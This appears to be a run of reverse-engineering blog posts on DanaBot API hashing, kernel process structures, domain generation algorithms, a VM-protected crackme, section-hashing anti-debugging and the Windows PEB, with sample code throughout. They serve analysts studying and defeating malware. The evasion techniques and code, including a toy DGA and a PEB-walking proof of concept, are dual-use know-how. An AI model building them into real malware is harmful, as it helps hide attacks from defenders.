The hash is computed solely from the function name, so the first step is to get a pointer to all function names of the target library. Each DLL contains a table with all exported functions, which are loaded into memory. This Export Directory is always the first entry in the Data Directory array. The PE file format and its headers contain enough information to reach this mentioned directory by parsing header structures:

Cycling through the PE headers to obtain the ExportDirectory and AddressOfNames
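
The header walk can be reproduced with a few struct reads. The Python sketch below follows e_lfanew to the PE signature, skips the file header and reads entry 0 of the Data Directory array. The function names are mine, and the helper at the bottom only builds a synthetic, header-only buffer for demonstration:

```python
import struct


def export_directory(image):
    """Return (rva, size) of the Export Directory from raw PE bytes."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    optional_header = e_lfanew + 4 + 20  # signature + IMAGE_FILE_HEADER
    (magic,) = struct.unpack_from("<H", image, optional_header)
    if magic == 0x10B:    # PE32
        data_directory = optional_header + 96
    elif magic == 0x20B:  # PE32+
        data_directory = optional_header + 112
    else:
        raise ValueError("unknown optional header magic")
    # Entry 0 of the Data Directory array is the Export Directory.
    return struct.unpack_from("<II", image, data_directory)


def make_test_image(export_rva, export_size):
    """Build a synthetic, header-only PE32 buffer for demonstration."""
    image = bytearray(0x200)
    image[0:2] = b"MZ"
    struct.pack_into("<I", image, 0x3C, 0x80)
    image[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<H", image, 0x80 + 24, 0x10B)
    struct.pack_into("<II", image, 0x80 + 24 + 96, export_rva, export_size)
    return bytes(image)
```

From the returned RVA, the AddressOfNames field sits at offset 0x20 inside the IMAGE_EXPORT_DIRECTORY structure.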

In the picture below, you can see an example of the mentioned junk instructions, as well as the critical block, which compares the computed hash with the checksum of the function we want to call. The routine iterates through all function names in the Export Directory and calculates the hash.
The loop breaks once the computed hash matches the value that is stored in the EDX register since the beginning of this routine.

Graph overview of obfuscated API Hashing function

Reversing the hashing algorithm

The hashing algorithm itself is fairly simple. Junk instructions and opaque predicates complicate the process of reversing this routine, though.

The algorithm takes the nth and the stringLength-n-1th char of the function name and stores them, together with their capitalised versions, in memory, resulting in a total of 4 characters. Each one of those characters is XOR'd with the string length. In each loop iteration three of these values are multiplied and added to the running hash, which is then XOR'd with the fourth.

def get_hash(funcname):
    """Calculate the hash value for function name. Return hash value as integer"""
    strlen = len(funcname)
    # if the length is even, we encounter a different behaviour
    i = 0
    hashv = 0x0
    while i < strlen:
        if i == (strlen - 1):
            ch1 = funcname[0]
        else:
            ch1 = funcname[strlen - 2 - i]
        # init first character and capitalize it
        ch = funcname[i]
        uc_ch = ch.capitalize()
        # Capitalize the second character
        uc_ch1 = ch1.capitalize()
        # Calculate all XOR values
        xor_ch = ord(ch) ^ strlen
        xor_uc_ch = ord(uc_ch) ^ strlen
        xor_ch1 = ord(ch1) ^ strlen
        xor_uc_ch1 = ord(uc_ch1) ^ strlen
        # do the multiplication and XOR again with upper case character1
        hashv += ((xor_ch * xor_ch1) * xor_uc_ch)
        hashv = hashv ^ xor_uc_ch1
        i += 1
    return hashv

A python script for calculating the hash for a given function name is also uploaded on my github page[2] and free for everyone to use. I’ve also uploaded a text file with hashes for exported functions of commonly used DLLs.

Deobfuscation by Commenting

So now that we cracked the algorithm, we want to update our disassembly to know which hash value represents which function. As I’ve already mentioned, we want to focus on simplicity. The easiest way is to compute hash values for exported functions of commonly used DLLs and write them into a file.

Generated hashes

With this file, we can write an IDAPython script to comment the library function name next to the API Hashing call. Luckily the API Hashing function is always called with the same pattern:

  • Move the wanted hash value into the EDX register
  • Move a DWORD into EAX register

First we retrieve all XRefs of the API Hashing function. Each XRef contains an address where the API Hashing function is called, which means that we will find the mentioned pattern within the few instructions preceding it. So we fetch the previous instruction until we extract the wanted hash value, which is being moved into EDX. Finally we can use this immediate to look up the corresponding API function in the hash values we have generated before and comment the function name next to the XRef address.

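import idautils
import idc
from idc import GetMnem, GetOpnd, PrevHead  # legacy (pre-7.4) IDAPython names


def add_comment(addr, hashv, api_table):
    """Write a comment at addr with the matching api function. Return True if a corresponding api hash was found."""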
    # remove the "h" at the end of the string
    hashv = hex(int(hashv[:-1], 16))
    keys = api_table.keys()
    if hashv in keys:
        apifunc = api_table[hashv]
        print "Found ApiFunction = %s. Adding comment." % (apifunc,)
        idc.MakeComm(addr, apifunc)
        comment_added = True
    else:
        print "Api function for hash = %s not found" % (hashv,)
        comment_added = False
    return comment_added


def main():
    """Main"""
    f = open(
        "C:\\Users\\luffy\\Desktop\\Danabot\\05-07-2020\\Utils\\danabot_hash_table.txt", "r")
    lines = f.readlines()
    f.close()
    api_table = get_api_table(lines)
    i = 0
    ii = 0
    for xref in idautils.XrefsTo(0x2f2858):
        i += 1
        currentaddr = xref.frm
        addr_minus = currentaddr - 0x10
        while currentaddr >= addr_minus:
            currentaddr = PrevHead(currentaddr)
            is_mov = GetMnem(currentaddr) == "mov"
            if is_mov:
                dst_is_edx = GetOpnd(currentaddr, 0) == "edx"
                # needs to be edx register to match pattern
                if dst_is_edx:
                    src = GetOpnd(currentaddr, 1)
                    # immediate always ends with 'h' in IDA
                    if src.endswith("h"):
                        add_comment(xref.frm, src, api_table)
                        ii += 1
                        # pattern found, stop walking back for this xref
                        break
    print "Total xrefs found %d" % (i,)
    print "Total api hash functions deobfuscated %d" % (ii,)


if __name__ == '__main__':
    main()

Conclusion

As reverse engineers, we will probably continue to encounter API Hashing in various different ways. I hope I was able to show you a quick & dirty method, or at least give you a foundation for beating this obfuscation technique. I also hope that, the next time a blue team fellow has to analyse DanaBot, this article comes in handy and saves them some time reverse engineering this banking trojan.

IoCs

  • Dropper = e444e98ee06dc0e26cae8aa57a0cddab7b050db22d3002bd2b0da47d4fd5d78c
  • DLL = cde01a2eeb558545c57d5c71c75e9a3b70d71ea6bbeda790a0b871fcb1b76f49

Linux/Windows Internals – Process structures

9 August 2020 at 13:43

Having an overview of the running processes on the operating system is something we usually take for granted. We can’t think of working without fundamental features like that.

But how does the kernel keep track of the processes which are currently running? Today, we take a look at the corresponding structures of the Windows and the Linux system, which are responsible for keeping track of the running processes.

Linux – Task structures

If you ever used Linux before, you are probably familiar with the ps command, which allows you to print the list of all processes currently running on the system. We will dive into how the Linux kernel keeps track of these processes internally.

The kernel stores a list of processes in a doubly linked list, called the task list. Each node in this list is a process descriptor of the type task_struct. The definition of this task struct can be found in linux/sched.h[1] of Linus Torvalds’ git repository.

Some struct members of task_struct

If you checked out the code, you will realise that this structure is pretty extensive and we will not dive into every member of this structure. Our focus lies on understanding how the kernel handles this task list. As I’ve already explained, the kernel keeps track of all processes by a doubly linked list. Each task structure holds a member tasks of type list_head.

struct list_head {
    struct list_head *next, *prev;
};

As you’ve probably already guessed, the next pointer holds a reference, which allows us to retrieve the next task_struct and the prev field allows us to take a step back. We can write a simple Linux kernel module to iterate through the task list and print out all process names and process ids on the current system:

Iterating through the linked list

Task structures lie in kernel space, so accessing these is not possible without writing a kernel module. The code is pretty straightforward. We just use the init_task as an initial entry point, which is the idle task running on the Linux system. Iterating through the linked list is possible via the next_task macro. Then we use the printk function to log the comm (process executable) member and the process id.

#include <linux/sched/task.h> 
#include <linux/sched/signal.h>
#include <linux/module.h>    
#include <linux/kernel.h>    
#include <linux/init.h>      

MODULE_LICENSE("GPL");
MODULE_AUTHOR("Andreas Klopsch");
MODULE_DESCRIPTION("Simple module for printing task structure members");
MODULE_VERSION("0.1");
  
// get the top element in the task doubly linked list
extern struct task_struct init_task;


static int __init action_init(void){
	struct task_struct *task;
	printk(KERN_INFO "Init task = %s\n", init_task.comm);
	printk(KERN_INFO "Getting next task\n");
	rcu_read_lock(); // the task list is protected by RCU
	// walk by pointer: task_struct is several kilobytes, so copying it by value onto the kernel stack is risky
	// use the next_task macro to not iterate through list_head by hand
	for (task = next_task(&init_task); task != &init_task; task = next_task(task)) {
		printk(KERN_INFO "Comm = %s pid = %d\n", task->comm, task->pid);
	}
	rcu_read_unlock();
	return 0;
}
 

static void __exit action_exit(void){
	printk(KERN_INFO "Stopping task iterator");
}
 
module_init(action_init);
module_exit(action_exit);

dmesg output
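
The traversal logic itself does not depend on the kernel and can be modelled in user space. The following Python sketch builds a small circular doubly linked list and walks it until it arrives back at the head, which is what the module above does with init_task. The class, the helper names and the example processes are made up for illustration:

```python
class Task:
    """Stand-in for task_struct: a name, a pid and the list links."""

    def __init__(self, comm, pid):
        self.comm = comm
        self.pid = pid
        self.next = self  # a single node points at itself
        self.prev = self


def add_tail(head, task):
    """Insert task right before head, i.e. at the end of the circular list."""
    last = head.prev
    last.next = task
    task.prev = last
    task.next = head
    head.prev = task


def walk(head):
    """Yield every task after head until the walk arrives back at head."""
    task = head.next
    while task is not head:
        yield task
        task = task.next


init_task = Task("swapper/0", 0)
for comm, pid in [("systemd", 1), ("kthreadd", 2), ("bash", 1337)]:
    add_tail(init_task, Task(comm, pid))
listing = [(t.comm, t.pid) for t in walk(init_task)]
```

The stop condition is the important detail: the list has no NULL terminator, so the loop ends when it sees the head again.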

Windows – EPROCESS

On Windows, there are similarities with Linux. Each process on Windows is represented by an EPROCESS structure, which is actually the representation of a process object. The EPROCESS structure also contains a KPROCESS structure, which holds information for the kernel.

As with Linux, this block contains various information relating to the corresponding process, like:

  • Virtual Address Descriptors, holding the map of the process virtual memory
  • Process ID
  • Image base name

Another similarity with the Linux system is the way the processes are linked with each other. EPROCESS structures are connected to each other via a doubly linked list, called ActiveProcessLinks. The next process in the list is referenced by the Flink pointer and the previous process object is referenced by the Blink pointer. One way to enumerate processes is therefore to walk the ActiveProcessLinks list, just as we did with the task list on Linux.

References

  • Windows Internals, Part 1: System Architecture, Processes, Threads, Memory Management, and More
  • Mastering Malware Analysis: The complete malware analyst’s guide to combating malicious software, APT, cybercrime, and IoT attacks 

DGAs – Generating domains dynamically

5 November 2020 at 09:49

A domain generation algorithm is a routine/program that generates a domain dynamically. Think of the following example:

An actor registers the domain evil.com. The corresponding backdoor has this domain hardcoded into its code. Once the attacker infects a target with this malware, it will start contacting its C2 server.

As soon as a security company obtains the malware, it might blacklist the registered domain evil.com. This will hinder any attempts of the malware to receive commands from the original C2.

Had a domain generation algorithm been used, the domain would be generated based on a seed. The current date, for example, is a popular seed amongst malware authors. A simple domain blacklisting would not solve the problem. The security company would have to resort to different methods.

By generating domains dynamically, it is harder for defenders to hinder the malware from contacting its C2 server. It will be necessary to understand the algorithm.

Example implementation of a DGA

A quick & dirty implementation (loosely based on Wikipedia)[1] of such an algorithm could look like this:

"""Example implementation of a domain generation algorithm."""

import sys
import time
import random


def gen_domain(month, day, hour, minute):
    """Generate the domain based on time. Return domain"""
    print(
        f"[+] Gen domain based on month={month} day={day} hour={hour} min={minute}")
    domain = ""
    for i in range(8):
        month = (((month * 8) ^ 0xF))
        day = (((day * 8) ^ 0xF))
        hour = (((hour * 8) ^ 0xF))
        minute = (((minute * 8) ^ 0xF))
        domain += chr(((month * day * hour * minute) % 25) + 0x61)
    # Append the TLD, as seen in the sample output
    return domain + ".com"


try:
    while True:
        # randint is inclusive on both ends, so cap hours at 23 and minutes at 59
        d = gen_domain(random.randint(1, 12), random.randint(1, 30),
                       random.randint(0, 23), random.randint(0, 59))
        print(f"[+] Generated domain = {d}")
        time.sleep(5)
except KeyboardInterrupt:
    sys.exit()

In a real sample, the DGA would use the current date and time as a seed. The demo above feeds in random values instead, so that it prints a different domain every five seconds. In each of the eight rounds, every parameter is multiplied by 8 and XOR'd with 0xF, and then all four values are multiplied with each other. The final modulo and the addition of 0x61 make sure that we generate a lowercase letter. The output of this program looks like this:

[+] Gen domain based on month=12 day=2 hour=4 min=4
[+] Generated domain = taavtaab.com
[+] Gen domain based on month=3 day=10 hour=11 min=36
[+] Generated domain = kugxfkvx.com
[+] Gen domain based on month=2 day=27 hour=4 min=1
[+] Generated domain = kaasuapn.com

Seed or Dictionary based

There are two main approaches when implementing a domain generation algorithm. For the sake of keeping this simple, we will not focus on the hybrid approach.

Different kinds of approaches

Seed based Approach

We already introduced the first one. Our implementation is an algorithm based on a seed, which serves as its input. Another example is how APT34 used such a seed based algorithm in a campaign targeting a government organisation in the Middle East. The campaign was discovered by FireEye[2].

The APT group used a domain generation algorithm in one of their downloaders. The downloader was named BONDUPDATER by FireEye and is implemented in PowerShell.

BONDUPDATER DGA algorithm

The first 12 characters of the UUID are extracted. Next, the program enters a loop. In each iteration, a new random number is generated and the domain is built by concatenating hardcoded and generated values. GetHostAddresses then tries to resolve the generated domain. If it fails, a new iteration starts. Once a registered domain is generated and resolved, the loop ends.

Depending on the resolved IP address, the script will trigger different actions.

Dictionary based Approach

The second approach is to create a dictionary based domain generation algorithm. Instead of focusing on a seed, one or more lists of words are provided. The algorithm randomly selects words from these lists and concatenates them to generate a new domain. Suppobox[3] is a malware family that implements the dictionary based approach[4].
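To make the idea more tangible, here is a minimal sketch of a dictionary based DGA. The word lists, the .net TLD and the choice of seeding the random generator with the date are all assumptions made for illustration. This is not how Suppobox is actually implemented.

```python
"""Toy dictionary based DGA (illustrative only)."""

import random
from datetime import date

# Hypothetical word lists; a real sample would ship much larger ones
WORDS_A = ["silver", "garden", "window", "thunder", "button"]
WORDS_B = ["market", "stream", "figure", "number", "bottle"]


def dictionary_dga(day, count=3):
    """Return `count` domains for the given day.

    Seeding the PRNG with the date makes malware and operator
    pick the same words on the same day.
    """
    rng = random.Random(day.isoformat())
    return [rng.choice(WORDS_A) + rng.choice(WORDS_B) + ".net"
            for _ in range(count)]


for domain in dictionary_dga(date(2020, 11, 5)):
    print(f"[+] Generated domain = {domain}")
```

Because the generated names consist of real words, they tend to look less suspicious than the random-looking output of the seed based example.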

Defeating Domain Generation Algorithms

The straightforward way to counter these algorithms is to reverse engineer the routine and predict future domains. One famous case of predicting future domains is the takedown of the Necurs botnet by Microsoft[5]. By understanding the DGA, they were able to predict the domains for the next 25 months.
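Once the routine is understood, predicting domains is just a matter of running it with future seeds. The sketch below reimplements the toy algorithm from the example implementation (with the .com suffix from the sample output appended) and enumerates the domains for upcoming hours. The predict helper and the one-hour step are assumptions for illustration. A real DGA would dictate its own time resolution.

```python
"""Predict future domains of the toy DGA (illustrative only)."""

from datetime import datetime, timedelta


def gen_domain(month, day, hour, minute):
    """Same arithmetic as the toy DGA, without the logging."""
    domain = ""
    for _ in range(8):
        month = (month * 8) ^ 0xF
        day = (day * 8) ^ 0xF
        hour = (hour * 8) ^ 0xF
        minute = (minute * 8) ^ 0xF
        domain += chr(((month * day * hour * minute) % 25) + 0x61)
    return domain + ".com"


def predict(start, hours):
    """Return (timestamp, domain) pairs for the next `hours` hours."""
    result = []
    for i in range(hours):
        t = start + timedelta(hours=i)
        result.append((t, gen_domain(t.month, t.day, t.hour, t.minute)))
    return result


for when, domain in predict(datetime(2020, 11, 5, 9, 0), 3):
    print(f"[+] {when:%Y-%m-%d %H:%M} -> {domain}")
```

A defender could feed such a list into a blocklist or register the domains ahead of the attacker.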

I am not an ML magician. However, a quick Google search shows that there is a lot of research going on. Machine learning based approaches to counter DGAs seem to be promising too.

Taming Virtual Machine Based Code Protection – 2

26 November 2020 at 14:02

In the last episode …

As you’ve probably guessed, this is the second part of my journey to reverse engineer a virtual machine protected binary. If you haven’t read the first part[1], I encourage you to do so, because I will not repeat everything here. While the first part dealt with explaining the virtual environment and giving a first look into the virtual machine’s custom instruction set, this time I will focus on disassembling the virtual machine code completely.

I might repeat some steps from the first part again, mostly because I felt that it was necessary to do so :-).

Into the battle

We already explained the environmental setup in the previous blog post and also identified the main loop, which is responsible for instruction execution.

Figure 1: Main loop responsible for instruction execution

Each iteration, an instruction is parsed and the final CALL in the left branch of figure 1 executes the instruction.

Critical functions

I covered the instruction parsing process in my last blog article a little bit. But since we are going to build a disassembler, I will explain the most important routines once again.

0x4013DF / ParseInstruction

This function is called each iteration in the loop from figure 1 and is responsible for parsing the byte codes.

Figure 2: ParseInstruction overview

Each loop, the Virtual Instruction Pointer/VIP is retrieved, pointing at the instruction to execute. Each instruction is parsed. This function is fully responsible for transforming the bytes into a further processable format. Let’s take a look at how the first three instructions are parsed:

Figure 3: Parsing instructions

If you are interested in understanding this format fully, I recommend you to jump to the disassembler code[2]. I will only cover the first instruction here.

So how do we get from 03 15 03 00 04 to the parsed format ?

The first byte is always the instruction id. 03 is the id for the PUSH instruction. The second byte is divided into its upper 6 bits and lower 2 bits, which represent the instruction size and the number of operands used by this instruction. The remaining bytes describe a single operand. In the example above, the first operand config, 00 03 00 00, is the configuration for USE 32 BIT OF REGISTER, where the register is specified by the next DWORD. That DWORD is 04 00 00 00, which selects virtual register 4. Now which register is VR4 here? Let’s take a quick look at the instructions.

PUSH VR4
MOV VR4, VR7
SUB VR7, 0xB4

This looks very similar to the usual function prologue ;-). So VR4 must be EBP and VR7 must be ESP!

PUSH EBP
MOV EBP, ESP
SUB ESP, 0xB4
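The header decoding described above can be sketched in a few lines of Python. The function name and the tiny mnemonic table are my own for this illustration (only the PUSH id is taken from the text), and I assume that the upper 6 bits hold the size and the lower 2 bits the operand count, in the order the text lists them.

```python
"""Decode the two header bytes of a virtual instruction (sketch)."""

# Only the PUSH id is known from the text; other ids are left out
MNEMONICS = {0x03: "PUSH"}


def decode_header(raw):
    """Return (mnemonic, size, operand_count) for raw instruction bytes."""
    opcode = raw[0]
    size = raw[1] >> 2             # upper 6 bits
    operand_count = raw[1] & 0b11  # lower 2 bits
    return MNEMONICS.get(opcode, f"OP_{opcode:02X}"), size, operand_count


print(decode_header(bytes.fromhex("0315030004")))
# -> ('PUSH', 5, 1)
```

The decoded size of 5 matches the five bytes 03 15 03 00 04 of the first instruction, which is a nice sanity check for this reading of the format.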

0x401271 / GetOpval & 0x401322 / StoreOpval

I will not cover these two functions in depth here. If you take a look at figure 3 again, you will see that I mention the operand configs. These functions are responsible for filling the operands according to these configs.

In the example above, the SUB VR7, 0xB4 instruction uses 00030000 07000000 for the first operand and 00020000 B4000000 for the second. If you reverse engineer every single option, you will find that the following configurations exist:

# First DWORD CONFIG
00000000 ==> LOWEST BYTE OF REG X # e.g. AL
00010000 ==> SECOND LOWEST BYTE OF REG X # e.g. AH
00020000 ==> LOWER 16 BIT OF REG X # e.g. AX
00030000 ==> 32 BIT OF REG X # e.g. EAX
01000000 ==> BYTE AT LOC
01010000 ==> BYTE AT LOC
01020000 ==> WORD AT LOC
01030000 ==> DWORD AT LOC
02000000 ==> BYTE FROM IMM.
02010000 ==> BYTE FROM IMM.
02020000 ==> WORD FROM IMM.
02030000 ==> DWORD FROM IMM.
# Second DWORD CONFIG, if register
00000000 ==> EAX
01000000 ==> EBX
02000000 ==> ECX
03000000 ==> EDX
04000000 ==> EBP
05000000 ==> ESI
06000000 ==> EDI
07000000 ==> ESP
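The table above translates almost directly into a small lookup. The following Python sketch decodes one parsed operand (config DWORD plus value DWORD). The function name and the output format are made up for this example, and I assume that the first config byte selects the operand kind and the second one the width, as the table suggests.

```python
"""Decode a parsed operand: config DWORD + value DWORD (sketch)."""

import struct

REGISTERS = ["EAX", "EBX", "ECX", "EDX", "EBP", "ESI", "EDI", "ESP"]
REG_WIDTHS = {0: "lowest byte", 1: "second lowest byte",
              2: "lower 16 bit", 3: "32 bit"}
DATA_WIDTHS = {0: "byte", 1: "byte", 2: "word", 3: "dword"}


def decode_operand(config, value):
    """Return a readable description of one operand."""
    kind, width = config[0], config[1]
    (number,) = struct.unpack("<I", value)  # value DWORD is little endian
    if kind == 0:
        return f"{REGISTERS[number]} ({REG_WIDTHS[width]})"
    if kind == 1:
        return f"[{number:#x}] ({DATA_WIDTHS[width]} at loc)"
    if kind == 2:
        return f"{number:#x} ({DATA_WIDTHS[width]} imm)"
    raise ValueError(f"unknown operand kind {kind}")


print(decode_operand(bytes.fromhex("00030000"), bytes.fromhex("04000000")))
print(decode_operand(bytes.fromhex("02030000"), bytes.fromhex("B4000000")))
```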

Eternal Debugging

Now we can use this knowledge to get an initial understanding of what is happening and to verify whether we are able to decode instructions manually.

Figure 4: Manually disassembled bytecode

If you take a look at the last instructions, you will see that there are some constants pushed into memory. If you google these constants, you will come to the conclusion that this must be the MD5 Init routine[3]. The next step is to build a disassembler.

Disassembling the code

I wrote this one in C++ and you can find the source code on my GitHub page[4]. Writing it in Python would have been possible too … and probably a lot easier and faster, but I chose C++ for learning purposes. If my C++ is awful, forgive me. We all start somewhere ;-).

Figure 5: Output of decoded virtual machine bytes

Our disassembler does have some limitations though. The disassembly was complex and I believe that some memory address offsets and register sizes are wrong. Also, I did not reverse engineer all instructions. That should not be a problem, however, because we only need to understand what is happening here on a higher level.

Identifying the algorithm

We already spotted the variables, which we also found in the MD5.c source code (e.g. 0x2381bc0). However, the actual hashing algorithm does not match the original one. Therefore, it seems to be some kind of modified version of it. Furthermore, we spot a routine which seems to be the XTEA algorithm[5].

Figure 6: Identified XTEA algorithm

Final words

So that’s basically it. I don’t know if and when I will write a third part covering the serial key generator. When I started this challenge, I was only interested in learning how to disassemble custom instruction sets.

If you are interested in how others solved this challenge, I recommend reading the tutorials from wagonono and kernelj. They both completely solved this challenge[6]. Wagonono also created a disassembler and his version is better than mine.

Catching Debuggers with Section Hashing

24 January 2021 at 10:41

As a reverse engineer, you will always have to deal with various anti-analysis measures. The number of ways to hamper our work is endless. Not only will you have to deal with code obfuscation that hinders your static analysis, but also with tricks that prevent you from debugging the software you want to dig deeper into. Today I want to present Section Hashing.

I will begin by explaining how software breakpoints work internally and then give you an example of a Section Hashing implementation.

Debuggers – How software breakpoints work

When you set a breakpoint in your favourite debugger at a specific instruction, the debugger will temporarily replace it with another instruction, which causes a fault or an interrupt. On x86, this is very often the INT 3 instruction, which is encoded as the single byte 0xCC. We can examine what this looks like in RAM.

We open x32dbg.exe and debug a 32 bit PE and set a breakpoint near the entry point.

Disassembly view of debugged program

When setting a breakpoint, you will see the original instruction instead of the patched one in the debugger. However, we can examine the same memory page in RAM with ProcessHacker.

Code section in RAM during debug session

In volatile memory, the byte 33 changed to CC, which will cause the program to halt when reached. This software interrupt will then be handled by the debugger and the code will be replaced again.

Catching Breakpoints with Section Hashing

After explaining how software breakpoints work, I’ll get to the real topic of this article now. We will move to the Linux world now for this example.

A software breakpoint is actually nothing more than a modification of the executable code in RAM. Once a breakpoint is set, the .text section is modified. A well-known technique to catch such breakpoints in RAM is called Section Hashing.

Authors can embed the hash of the .text section in the binary. Upon execution, they use the same algorithm to generate a new hash from the .text section. If a software breakpoint is set, the hash will differ from the embedded hash. An example implementation can look like this:

Example implementation of Section Hashing

In this case, a hash of the .text section is generated. Afterwards it is used to influence the generation of the flag. If a software breakpoint is set during execution, a wrong hash will be generated.

This is a simple example of Section Hashing. In combination with code obfuscation and other anti-analysis measures, it can be very hard to spot this technique. It is also occasionally used by commercial packers.
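The principle can also be simulated without touching a real process. The Python sketch below treats a short byte string as a stand-in for the .text section, embeds its hash and then patches one byte to 0xCC, just like a debugger would. SHA-256 and all names are assumptions for this illustration. A real implementation would hash its own mapped code section and would likely use something cheaper.

```python
"""Simulated Section Hashing over a byte buffer (illustrative only)."""

import hashlib

# push ebp; mov ebp, esp; xor eax, eax; pop ebp; ret
TEXT_SECTION = bytes.fromhex("5589e533c05dc3")


def section_hash(code):
    """Hash the (simulated) code section."""
    return hashlib.sha256(code).hexdigest()


# Hash computed at build time and embedded in the binary
EMBEDDED_HASH = section_hash(TEXT_SECTION)


def is_tampered(code):
    """Return True if the code no longer matches the embedded hash."""
    return section_hash(code) != EMBEDDED_HASH


# A debugger sets a software breakpoint on "xor eax, eax" (byte 0x33)
patched = bytearray(TEXT_SECTION)
patched[3] = 0xCC

print(f"[+] Clean section tampered?   {is_tampered(TEXT_SECTION)}")
print(f"[+] Patched section tampered? {is_tampered(bytes(patched))}")
```

A single changed byte is enough to produce a different hash, which is why software breakpoints stand out immediately.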

Defeating Section Hashing

There are multiple ways to defeat this technique, some of them could be:

  • Patching instructions
  • Using hardware breakpoints

Instead of modifying the code in memory, hardware breakpoints on x86 use dedicated debug registers to halt the execution. Hardware breakpoints are still detectable, though.

On Windows, the program can fetch the CONTEXT via GetThreadContext to see whether the debug registers are in use. A great example of how this is implemented can be found here[1]. If you are interested in trying to defeat Section Hashing yourself, you can give it a go at root-me.org[2].

PEB: Where Magic Is Stored

22 August 2021 at 15:49

As a reverse engineer, every now and then you encounter a situation where you dive deeper into the internal structures of an operating system than usual. Be it out of simple curiosity, or because you need to understand how a binary uses specific parts of the operating system in certain ways. One of the more interesting structures in Windows is the Process Environment Block/PEB. In this article, I’d like to introduce you to this structure and talk about various use cases of how adversaries can abuse it for their own purposes.

Introducing PEB

The Process Environment Block is a critical structure in the Windows OS, and most of its fields are not intended to be used by anything other than the operating system. It contains data that applies across a whole process and is stored in user-mode memory, which makes it accessible to the corresponding process. The structure contains valuable information about the running process, including:

  • whether the process is being debugged or not
  • which modules are loaded into memory
  • the command line used to invoke the process

All of this information gives adversaries a number of possibilities to abuse it. The listing below shows the layout of the PEB structure:

typedef struct _PEB {
  BYTE                          Reserved1[2];
  BYTE                          BeingDebugged;
  BYTE                          Reserved2[1];
  PVOID                         Reserved3[2];
  PPEB_LDR_DATA                 Ldr;
  PRTL_USER_PROCESS_PARAMETERS  ProcessParameters;
  PVOID                         Reserved4[3];
  PVOID                         AtlThunkSListPtr;
  PVOID                         Reserved5;
  ULONG                         Reserved6;
  PVOID                         Reserved7;
  ULONG                         Reserved8;
  ULONG                         AtlThunkSListPtr32;
  PVOID                         Reserved9[45];
  BYTE                          Reserved10[96];
  PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
  BYTE                          Reserved11[128];
  PVOID                         Reserved12[1];
  ULONG                         SessionId;
} PEB, *PPEB;

Now that we’ve talked a little bit about the layout and purpose of the structure, let’s take a look at a few use cases.

Reading the BeingDebugged flag

The most obvious use case is to check the BeingDebugged flag to identify whether a debugger is attached to the process. By reading the flag directly from memory instead of using the usual suspects like NtQueryInformationProcess or IsDebuggerPresent, malware can avoid noisy WinAPI calls. This makes the technique harder to spot.

However, most debuggers already take care of this. x64dbg, for example, has an option to hide the debugger by modifying the PEB structure at the start of the debugging session.

Iterating through loaded modules

Another use case could be iterating over the loaded modules to discover DLLs that were injected into memory in order to monitor the running process. To understand how to achieve this, we need to take a look at the PEB_LDR_DATA structure, which the Ldr field of the PEB points to:

typedef struct _PEB_LDR_DATA {
  BYTE       Reserved1[8];
  PVOID      Reserved2[3];
  LIST_ENTRY InMemoryOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;

PEB_LDR_DATA contains the head of a doubly linked list named InMemoryOrderModuleList. Each item in this list is a structure of type LDR_DATA_TABLE_ENTRY, which contains all the information we need to iterate over the loaded modules. See the structure of LDR_DATA_TABLE_ENTRY below:

typedef struct _LDR_DATA_TABLE_ENTRY {
    PVOID Reserved1[2];
    LIST_ENTRY InMemoryOrderLinks;
    PVOID Reserved2[2];
    PVOID DllBase;
    PVOID EntryPoint;
    PVOID Reserved3;
    UNICODE_STRING FullDllName;
    BYTE Reserved4[8];
    PVOID Reserved5[3];
    union {
        ULONG CheckSum;
        PVOID Reserved6;
    };
    ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;

So by iterating the doubly linked list, we are able to discover the base address and full name of all modules loaded into the memory of the running process. The snippet below is a small proof of concept. It iterates the linked list and prints the library name to stdout. I created it for the purpose of this blog article. You are free to use it, and I will also upload it to my GitHub repo in the upcoming days:

#include <Windows.h>
#include <cstdio>
#include <shlwapi.h>


#define NO_STDIO_REDIRECT

typedef struct _UNICODE_STRING
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;


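// Same layout as LDR_DATA_TABLE_ENTRY, but without the leading Reserved1[2],
// so that a pointer to InMemoryOrderLinks can be cast to this type directly.
typedef struct _LDR_DATA_TABLE_ENTRY_MOD {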
    LIST_ENTRY InMemoryOrderLinks;
    PVOID Reserved2[2];
    PVOID DllBase;
    PVOID EntryPoint;
    PVOID Reserved3;
    UNICODE_STRING FullDllName;
    BYTE Reserved4[8];
    PVOID Reserved5[3];
    union {
        ULONG CheckSum;
        PVOID Reserved6;
    };
    ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY_MOD, * PLDR_DATA_TABLE_ENTRY_MOD_MOD;




int main(int argc, char* argv[]) {

 
    PLDR_DATA_TABLE_ENTRY_MOD_MOD lib = NULL;
    _asm {
        xor eax, eax
        mov eax, fs:[0x30]
        mov eax, [eax + 0xC]
        mov eax, [eax + 0x14]
        mov lib, eax
    };
    printf("[+] Initialised pointer to first LDR_DATA_TABLE_ENTRY_MOD\n");
    

    // Loop until an entry without a module name shows up. This PoC relies on
    // that to stop once the walk wraps around to the head of the linked list.
    while ( lib->FullDllName.Buffer != NULL ) {

        printf("[+] %S\n", lib->FullDllName.Buffer);
        lib = (PLDR_DATA_TABLE_ENTRY_MOD_MOD)lib->InMemoryOrderLinks.Flink;
    }
    
    printf("[+] Done!\n");



    return 0;
}

If you are wondering how I am able to access the PEB in the code above, take a look at the inline assembly in the main function, especially the instruction mov eax, fs:[0x30]. FS is a segment register, similar to GS. On 32-bit Windows, FS can be used to access thread-specific memory, the Thread Environment Block. Offset 0x30 in that block holds the linear address of the Process Environment Block. From there, offset 0xC leads to the Ldr pointer, and offset 0x14 of PEB_LDR_DATA leads to InMemoryOrderModuleList.
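Since the module list is circular, a common way to end the walk is to stop as soon as Flink points back at the list head. The Python model below illustrates that termination condition with plain objects. The class and function names are hypothetical and nothing here touches real process memory.

```python
"""Model of walking a circular doubly linked list (illustrative only)."""


class Entry:
    """Stand-in for a LIST_ENTRY with an optional module name."""

    def __init__(self, name=None):
        self.name = name
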